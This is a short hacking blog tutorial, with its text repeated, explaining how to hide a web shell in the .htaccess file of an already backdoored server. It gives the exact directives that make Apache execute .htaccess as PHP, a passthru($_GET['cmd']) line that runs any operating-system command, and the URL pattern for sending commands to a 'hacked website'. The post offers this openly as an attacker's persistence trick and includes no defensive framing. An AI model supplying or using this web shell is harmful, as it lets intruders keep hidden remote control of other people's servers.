.HTACCESS SHELL | HOW TO HIDE YOUR SHELL
Assalam~O~Alaikum Friends I am Hayat Khan Today I will be telling you all a less know trick in which your can use .htaccess file on your already backdoored server as a shell to execute OS commands, so just follow the simple steps described below.
Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpBNc4XnMGtKN7PbStm61pCdFmcC1H-7Ry8VuZCQXGw-M1_UMMjSr86fBclWhf9xgSCt_nAGH7_FgMb0SZvE0jca0Wve1ozB90mQHVWMXzgiaXOwlDfehtkHLOiYNjN76mu9aYYppURIE/s640/shell+1.GIF)
After clicking on the edit option, add the following lines of code in yout .htaccess file.
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfAvTbH_X80Y1S6t6ercDF9FI6mWoyIJyUx4_xsBSvLl2jnKKebwCFaozwRSVWLJxXTxaHEKc1r8qyoMOnC3LfctrcAXqE-rRgxYXckJzY966lOlJlXrU1y3pmFNox61EuIoI1BCMbnm8/s640/shell.GIF)
Assalam~O~Alaikum Friends I am Hayat Khan Today I will be telling you all a less know trick in which your can use .htaccess file on your already backdoored server as a shell to execute OS commands, so just follow the simple steps described below.
Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.
After clicking on the edit option, add the following lines of code in yout .htaccess file.
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
After adding your codes, save it, and you are done ! :D
Now in order to use your .htaccess shell
Now in order to use your .htaccess shell
http://www.your-hacked-website.com/.htaccess?cmd=ls
After ?cmd= you can execute any OS command of your choice Enjoy Tutorial
After ?cmd= you can execute any OS command of your choice Enjoy Tutorial
For More: Click Here
No comments:
Post a Comment